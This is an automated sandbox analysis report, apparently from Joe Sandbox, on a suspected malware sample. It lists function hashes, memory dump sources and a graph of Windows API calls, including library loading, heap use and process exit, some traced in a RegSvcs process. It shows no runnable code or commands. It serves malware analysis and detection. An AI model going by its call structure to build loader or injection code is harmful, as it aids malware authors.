                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2ccfe305154e95a536d18b49939e535c9c69fd109e9eb5688aea898868e671a0
                                                                  • Instruction ID: c2a6ac35d66bf3be807755926dcf6ff7fda2240ccdf397c9e8a50cff5a34c48a
                                                                  • Opcode Fuzzy Hash: 2ccfe305154e95a536d18b49939e535c9c69fd109e9eb5688aea898868e671a0
                                                                  • Instruction Fuzzy Hash: 2711BB75504380DFCB01CF10C5C0B15BBA2FB85314F24C6A9D9498B296C33AE80ACB61
                                                                  Function 008DD745 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f95fe278d5b380cb2ac4cca7506586b2b06ac2d8094623b0394641fe6cf1776
                                                                  • Instruction ID: c33cd7de79b29745893f02e9d9ba49e996e9457cda3b8f0cc8fa67c2f7a4fd14
                                                                  • Opcode Fuzzy Hash: 4f95fe278d5b380cb2ac4cca7506586b2b06ac2d8094623b0394641fe6cf1776
                                                                  • Instruction Fuzzy Hash: 5201F731404344DBE7204A16CD84B26FF98FF85324F14C69BEE098A386D2799840CAB1
                                                                  Function 008DD744 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c3e9230ce74848a63c22862629372433371206d70eeaee2d451288887c9ab1b
                                                                  • Instruction ID: 75b7fff2f61f71e299743307faa607f9c9b6868c41eb83984b1c51504c8b0286
                                                                  • Opcode Fuzzy Hash: 6c3e9230ce74848a63c22862629372433371206d70eeaee2d451288887c9ab1b
                                                                  • Instruction Fuzzy Hash: D0F062714043449AE7108E16D888B62FF98EB91734F18C15BED085B296C2799844CBB1

                                                                  Non-executed Functions

                                                                  Function 009439CC Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: \~e
                                                                  • API String ID: 0-969365249
                                                                  • Opcode ID: 69a29bbb9bff31bdc3393a57b8ecf00b593ac462ab49d1819155b7abec9f2589
                                                                  • Instruction ID: 10ccd2b435688431c4d6381d8fb4f74b5128a1905a7c4ddfe8c529c679ebfd01
                                                                  • Opcode Fuzzy Hash: 69a29bbb9bff31bdc3393a57b8ecf00b593ac462ab49d1819155b7abec9f2589
                                                                  • Instruction Fuzzy Hash: 0D51B474E592468FCB05CFA9C8849DEBFF1FF49310F14D5AAC445AB2A2D7348A42CB91
                                                                  Function 00945A59 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9\;'
                                                                  • API String ID: 0-1350165936
                                                                  • Opcode ID: 7623bf7141ab025da12d5f0570b42f64d5c4c6f75e2aa69a2b4ddd1f7ce2c586
                                                                  • Instruction ID: 2aa2fa6b78de937f7c77da0ac815803950f851e955d86cba7683bb99a15eaf68
                                                                  • Opcode Fuzzy Hash: 7623bf7141ab025da12d5f0570b42f64d5c4c6f75e2aa69a2b4ddd1f7ce2c586
                                                                  • Instruction Fuzzy Hash: B341E3B4E0560A9FCB08CFA9C580AAEFBF2FF88300F25C56AC405A7255D7349A41CF94
                                                                  Function 00945A68 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9\;'
                                                                  • API String ID: 0-1350165936
                                                                  • Opcode ID: 0f41d63d84329839c761b0fc9c35f2772a363b3391dcecff9a72c8e304cb36fd
                                                                  • Instruction ID: 171e2941f171cd0687ab4fd5b52990b1fdabeaf3d0c1d200973d963c3195b23c
                                                                  • Opcode Fuzzy Hash: 0f41d63d84329839c761b0fc9c35f2772a363b3391dcecff9a72c8e304cb36fd
                                                                  • Instruction Fuzzy Hash: DF41D2B4E0560ADFCB08CFA9C580AAEFBF2FB88300F25D56AC415A7215D7349A41CF94
                                                                  Function 09669C89 Relevance: .3, Instructions: 316COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dacb4e871a0edf82b770e03745b86a205463b33617d0aebe65382de30f3cfcd1
                                                                  • Instruction ID: 8e4a99ab9adf197549f798712a5732596db7595bf9027d2df413b84480fa96cd
                                                                  • Opcode Fuzzy Hash: dacb4e871a0edf82b770e03745b86a205463b33617d0aebe65382de30f3cfcd1
                                                                  • Instruction Fuzzy Hash: 2BE10E74E001298FDB14DFA9C580AAEFBB2FF89305F248269D855A7355D7319D42CFA0
                                                                  Function 0966B920 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ebb219b9189cca23f72177a3cc0d24309bb1d2e54cfdd1fca5bda5de6315093b
                                                                  • Instruction ID: 39d47ce2f35ed32b9490139cfea59313156722dd66f9a6d9f8f54445b85c9d54
                                                                  • Opcode Fuzzy Hash: ebb219b9189cca23f72177a3cc0d24309bb1d2e54cfdd1fca5bda5de6315093b
                                                                  • Instruction Fuzzy Hash: CCE1DA74E04129CFDB14DFA9C580AAEBBB2FF89305F248269D455A7355D730AD42CFA0
                                                                  Function 09669860 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d38c421687fb4074432fca69a6b9ad5126b0dfcbf2484166838961307712085
                                                                  • Instruction ID: cd80eddad8198ef7bcd3ebf82d3d055d0f5c9c563ff0bca2b22dabe0980f77e1
                                                                  • Opcode Fuzzy Hash: 2d38c421687fb4074432fca69a6b9ad5126b0dfcbf2484166838961307712085
                                                                  • Instruction Fuzzy Hash: 07E1E974E002698FDB14DF99C580AAEFBB2FF89305F248259D855AB355D730AD42CFA0
                                                                  Function 0966A0D0 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97ae86606d3afecc91523ecf8bf66a6f2d5b5ac94367453faa8262ee78b21792
                                                                  • Instruction ID: bc85c001ecead01a55a7e94c57f6d0c7f97375c76d2ce886035fde49b75a192d
                                                                  • Opcode Fuzzy Hash: 97ae86606d3afecc91523ecf8bf66a6f2d5b5ac94367453faa8262ee78b21792
                                                                  • Instruction Fuzzy Hash: 0DE12CB4E002298FDB14DF99C584AAEFBB2FF89305F248269D455A7315C731AD42CFA0
                                                                  Function 0966C2D0 Relevance: .3, Instructions: 312COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10c8e52de908e2ae0c3882e78fc207cb85bb1e70693d9a15855b90927b57aa77
                                                                  • Instruction ID: e5335eef6b49c1edcd953b23e10be0ee8af9253853232dfdbe8e81bed609bec7
                                                                  • Opcode Fuzzy Hash: 10c8e52de908e2ae0c3882e78fc207cb85bb1e70693d9a15855b90927b57aa77
                                                                  • Instruction Fuzzy Hash: 93E11DB4E006298FDB14DF99C580AAEFBB2FF89305F248269D555A7315C734AD42CFA0
                                                                  Function 07C82381 Relevance: .2, Instructions: 240COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24b492fd940eae73a96d0cd06d8a9be7d7fed34778bf0e239192c6176d60fadf
                                                                  • Instruction ID: f9a32db4e8ee5b862b72580ee6f10f6b8f955b8ef9fc0ba9e15c6324318a2b66
                                                                  • Opcode Fuzzy Hash: 24b492fd940eae73a96d0cd06d8a9be7d7fed34778bf0e239192c6176d60fadf
                                                                  • Instruction Fuzzy Hash: A0A1BCB4E152198FDB54CFA5C980A9EFBF2FF89304F2481AAD408A7325D7309A41CB61
                                                                  Function 07C823D0 Relevance: .2, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c40379e24b77cc8328b005a79d6a08f9f0852f331f7d23a211f6768c8de2cf1
                                                                  • Instruction ID: ca06a43be111005529878fb9694506ef38c40e2b6d43f3cb5141e0757022d0d8
                                                                  • Opcode Fuzzy Hash: 6c40379e24b77cc8328b005a79d6a08f9f0852f331f7d23a211f6768c8de2cf1
                                                                  • Instruction Fuzzy Hash: FAA17BB4E11229DFCB54DFA5C984A9EFBB2FF89304F24816AD409A7315D7309A41CF61
                                                                  Function 00942030 Relevance: .2, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43033ab2543d416e82989591952a369669302206b7454927029061f97cbc9a43
                                                                  • Instruction ID: 35535efe92ab893dc36a035c02459ac6cf151643b5c160157df49dbafe793201
                                                                  • Opcode Fuzzy Hash: 43033ab2543d416e82989591952a369669302206b7454927029061f97cbc9a43
                                                                  • Instruction Fuzzy Hash: 9D71F574E0520ADFCB04CF99D580AAEFBB2FF89310F64952AE515AB314D3349A42CF91
                                                                  Function 07C82472 Relevance: .2, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 442e90d154c000b2004d11e661cd111e72d37025145cf48282dbe8bf7517b2cc
                                                                  • Instruction ID: d3dd2d273695f187d1fe60ded6f9670f40a03f9300dcbe57bd372c5bb6f17864
                                                                  • Opcode Fuzzy Hash: 442e90d154c000b2004d11e661cd111e72d37025145cf48282dbe8bf7517b2cc
                                                                  • Instruction Fuzzy Hash: E981AAB4E1522ADFCB54DFA5C580AAEFBB2FF89304F248169D409A7355D7309A41CF60
                                                                  Function 07C82542 Relevance: .2, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59f2bdd809d1099239538ee46ed6fe3432d452018700a84230993ae608696f06
                                                                  • Instruction ID: b7870c74f644fc583a08fb6b35dcfe7e9476f7b9e082d931c2789fb0146ea221
                                                                  • Opcode Fuzzy Hash: 59f2bdd809d1099239538ee46ed6fe3432d452018700a84230993ae608696f06
                                                                  • Instruction Fuzzy Hash: C6719BB4E1522ADFCB54DFA5C584A9EFBB2FF89304F248169D805A7315D7309A41CF60
                                                                  Function 07C82549 Relevance: .2, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ccddddca407b6309a486254cc873a8a7f4f2ecab229bb5e13e3d1f9314be732a
                                                                  • Instruction ID: c4e3625bfc13c3591e490861cc605fbb1d50e49d2d2b08b3c4f0895489c59b3b
                                                                  • Opcode Fuzzy Hash: ccddddca407b6309a486254cc873a8a7f4f2ecab229bb5e13e3d1f9314be732a
                                                                  • Instruction Fuzzy Hash: 9D718AB4E1522ADFCB54DFA5C584AAEFBB2FF89304F248269D409A7315D7309A41CF60
                                                                  Function 009457F0 Relevance: .2, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57ce96f8191fffbda46feed9420be612aa82c97c5e5faa0a8dc3a7321b2ad9c7
                                                                  • Instruction ID: 367a41c31db7429e177d5982368ac0922d9b699a7dcd5c3336aa0931fd3f1d22
                                                                  • Opcode Fuzzy Hash: 57ce96f8191fffbda46feed9420be612aa82c97c5e5faa0a8dc3a7321b2ad9c7
                                                                  • Instruction Fuzzy Hash: B061D474E15609DFCB08CF99C5809DEFBF2EF89310F25942AD815BB325E73499428B64
                                                                  Function 009457E0 Relevance: .2, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84ba71cbb7bb3da92b5fe5d55fc626d28d663b735d331bd2edc23bd5965ad7c9
                                                                  • Instruction ID: cdca51761a8bad2f12e3fc9162ded941801d456b93d686d1b92a1e17fe4ff873
                                                                  • Opcode Fuzzy Hash: 84ba71cbb7bb3da92b5fe5d55fc626d28d663b735d331bd2edc23bd5965ad7c9
                                                                  • Instruction Fuzzy Hash: 74612574E15609CFCB08CFA9C5808DEFBF2EF89310F25942AD415BB325E6349A428B64
                                                                  Function 00945250 Relevance: .2, Instructions: 154COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30813c140ce115dd85fecdaec180e3210316accc0cc73425d2122bbc617579f7
                                                                  • Instruction ID: 1d5fdc978b3b1d44708896cbf5ab1f983138e9a4f6f0d52f6a099afa0724274a
                                                                  • Opcode Fuzzy Hash: 30813c140ce115dd85fecdaec180e3210316accc0cc73425d2122bbc617579f7
                                                                  • Instruction Fuzzy Hash: B1612970E0460A9FCF04CFE9C481AEEFBB1BF85300F15855AD465AB255D3789A86CF94
                                                                  Function 0966C2C0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 655f5851d65bb2be08e7c230fc5cc2ce534a3ad4f55c8347ccf77310c3e5fef5
                                                                  • Instruction ID: 8cb3c6cc0028cba2222cdc313ce57c539af5f3d5383acd00c3ed83edc46daea4
                                                                  • Opcode Fuzzy Hash: 655f5851d65bb2be08e7c230fc5cc2ce534a3ad4f55c8347ccf77310c3e5fef5
                                                                  • Instruction Fuzzy Hash: A6513DB5E006298FDB14CFA9C5815AEFBF2FF89300F248169D558A7315D7349942CFA1
                                                                  Function 009455DA Relevance: .1, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c8ac3da8f8b9325452b32b130f172aa02ad8e8545170053fb19a0539b43149e
                                                                  • Instruction ID: 9f2271c74d7aafd299efe3207569d88089105acdc901674455969dc21f545b61
                                                                  • Opcode Fuzzy Hash: 1c8ac3da8f8b9325452b32b130f172aa02ad8e8545170053fb19a0539b43149e
                                                                  • Instruction Fuzzy Hash: 3D41E970E0460A9FDB04CFAAC4815AEFBF2BF88310F65C46AC415A7255D7359A418F94
                                                                  Function 009455E8 Relevance: .1, Instructions: 101COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bf6f4f6453f6cd2ee9245a8086f8ad3e5d05e0efa8e5609e91dd0d3dea5d289d
                                                                  • Instruction ID: 39f3331137fe9256b0d99f368a7ae689a93e1dea98df41d22b9d72ee0bc72363
                                                                  • Opcode Fuzzy Hash: bf6f4f6453f6cd2ee9245a8086f8ad3e5d05e0efa8e5609e91dd0d3dea5d289d
                                                                  • Instruction Fuzzy Hash: F241E3B0E0461ADBDB04CFEAC5809AEFBF2FF88300F65D46AC415A7255E7349A418F94
                                                                  Function 00940871 Relevance: .1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb30be64077849573c4314217a8d6477aba4a29a57e31480cc657f496b7fa4a3
                                                                  • Instruction ID: badf733d999f7d88b6994b57ac08a2c2591773208bc7fcf89767048ec480a97c
                                                                  • Opcode Fuzzy Hash: fb30be64077849573c4314217a8d6477aba4a29a57e31480cc657f496b7fa4a3
                                                                  • Instruction Fuzzy Hash: 2031F771E156188FEB18CF6AD840B9EFBF7BFC9300F14C4AAC558AA224D7344A858F51

                                                                  Execution Graph

                                                                  Execution Coverage:1.2%
                                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                                  Signature Coverage:4.9%
                                                                  Total number of Nodes:143
                                                                  Total number of Limit Nodes:9
                                                                  execution_graph 94899 424e03 94900 424e1c 94899->94900 94901 424e67 94900->94901 94904 424eaa 94900->94904 94906 424eaf 94900->94906 94907 42e893 94901->94907 94905 42e893 RtlFreeHeap 94904->94905 94905->94906 94910 42cb33 94907->94910 94909 424e77 94911 42cb4d 94910->94911 94912 42cb5e RtlFreeHeap 94911->94912 94912->94909 95052 424a73 95053 424a8f 95052->95053 95054 424ab7 95053->95054 95055 424acb 95053->95055 95056 42c7c3 NtClose 95054->95056 95057 42c7c3 NtClose 95055->95057 95058 424ac0 95056->95058 95059 424ad4 95057->95059 95062 42e9b3 RtlAllocateHeap 95059->95062 95061 424adf 95062->95061 95063 42f933 95064 42f943 95063->95064 95065 42f949 95063->95065 95066 42e973 RtlAllocateHeap 95065->95066 95067 42f96f 95066->95067 95068 42bdb3 95069 42bdd0 95068->95069 95072 16d2df0 LdrInitializeThunk 95069->95072 95070 42bdf8 95072->95070 94913 41a603 94914 41a61b 94913->94914 94916 41a675 94913->94916 94914->94916 94917 41e573 94914->94917 94918 41e599 94917->94918 94922 41e696 94918->94922 94923 42fa63 94918->94923 94920 41e634 94920->94922 94929 42be03 94920->94929 94922->94916 94924 42f9d3 94923->94924 94926 42fa30 94924->94926 94933 42e973 94924->94933 94926->94920 94927 42fa0d 94928 42e893 RtlFreeHeap 94927->94928 94928->94926 94930 42be20 94929->94930 94939 16d2c0a 94930->94939 94931 42be4c 94931->94922 94936 42cae3 94933->94936 94935 42e98e 94935->94927 94937 42cb00 94936->94937 94938 42cb11 RtlAllocateHeap 94937->94938 94938->94935 94940 16d2c1f LdrInitializeThunk 94939->94940 94941 16d2c11 94939->94941 94940->94931 94941->94931 94942 413b23 94943 413b45 94942->94943 94945 42ca53 94942->94945 94946 42ca6d 94945->94946 94949 16d2c70 LdrInitializeThunk 94946->94949 94947 42ca95 94947->94943 94949->94947 94950 418ec3 94952 418ef3 94950->94952 94953 418f1f 94952->94953 94954 41b363 94952->94954 94955 41b3a7 94954->94955 94956 41b3c8 94955->94956 94958 42c7c3 94955->94958 94956->94952 94959 42c7dd 94958->94959 94960 42c7ee NtClose 94959->94960 94960->94956 94961 414124 94962 4140a8 94961->94962 94967 417853 94962->94967 94964 4140cb 94965 414110 94964->94965 94966 4140ff PostThreadMessageW 94964->94966 94966->94965 94969 417877 94967->94969 94968 41787e 94968->94964 94969->94968 94970 41789d 94969->94970 94974 42fd13 LdrLoadDll 94969->94974 94972 4178b3 LdrLoadDll 94970->94972 94973 4178ca 94970->94973 94972->94973 94973->94964 94974->94970 94975 401886 94976 401816 94975->94976 94979 42fe03 94976->94979 94977 4019c4 94977->94977 94982 42e443 94979->94982 94983 42e469 94982->94983 94994 407333 94983->94994 94985 42e47f 94986 42e4db 94985->94986 94997 41b173 94985->94997 94986->94977 94988 42e49e 94989 42e4b3 94988->94989 95012 42cb83 94988->95012 95008 428343 94989->95008 94992 42e4cd 94993 42cb83 ExitProcess 94992->94993 94993->94986 94996 407340 94994->94996 95015 416503 94994->95015 94996->94985 94998 41b19f 94997->94998 95026 41b063 94998->95026 95001 41b1e4 95003 41b200 95001->95003 95006 42c7c3 NtClose 95001->95006 95002 41b1cc 95004 41b1d7 95002->95004 95005 42c7c3 NtClose 95002->95005 95003->94988 95004->94988 95005->95004 95007 41b1f6 95006->95007 95007->94988 95009 4283a5 95008->95009 95011 4283b2 95009->95011 95037 4186d3 95009->95037 95011->94992 95013 42cb9d 95012->95013 95014 42cbae ExitProcess 95013->95014 95014->94989 95017 41651d 95015->95017 95016 416536 95016->94996 95017->95016 95019 42d213 95017->95019 95021 42d22d 95019->95021 95020 42d25c 95020->95016 95021->95020 95022 42be03 LdrInitializeThunk 95021->95022 95023 42d2bc 95022->95023 95024 42e893 RtlFreeHeap 95023->95024 95025 42d2d5 95024->95025 95025->95016 95027 41b159 95026->95027 95028 41b07d 95026->95028 95027->95001 95027->95002 95032 42bea3 95028->95032 95031 42c7c3 NtClose 95031->95027 95033 42bebd 95032->95033 95036 16d35c0 LdrInitializeThunk 95033->95036 95034 41b14d 95034->95031 95036->95034 95039 4186fd 95037->95039 95038 418bfb 95038->95011 95039->95038 95045 413d03 95039->95045 95041 41882a 95041->95038 95042 42e893 RtlFreeHeap 95041->95042 95043 418842 95042->95043 95043->95038 95044 42cb83 ExitProcess 95043->95044 95044->95038 95047 413d23 95045->95047 95049 413d8c 95047->95049 95050 41b483 RtlFreeHeap LdrInitializeThunk 95047->95050 95048 413d82 95048->95041 95049->95041 95050->95048 95073 418e18 95074 42c7c3 NtClose 95073->95074 95075 418e22 95074->95075 95051 16d2b60 LdrInitializeThunk

                                                                  Executed Functions

                                                                  Function 00417853 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 371 417853-41787c call 42f473 374 417882-417890 call 42fa73 371->374 375 41787e-417881 371->375 378 4178a0-4178b1 call 42df13 374->378 379 417892-41789d call 42fd13 374->379 384 4178b3-4178c7 LdrLoadDll 378->384 385 4178ca-4178cd 378->385 379->378 384->385
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction ID: 1cb38ccdf7d651f1bb70c04efbc39f1e1caf3780722470d7d920a02544f09f31
                                                                  • Opcode Fuzzy Hash: 76b506a0cc5b578974a65303308517cdf43573eca2b8ac17c4e7b5baa97a7e0c
                                                                  • Instruction Fuzzy Hash: 110152B1E4020DB7DF10EAE1DC42FDEB7789B14308F4041A6E90897240F634EB48C795
                                                                  Function 0042C7C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
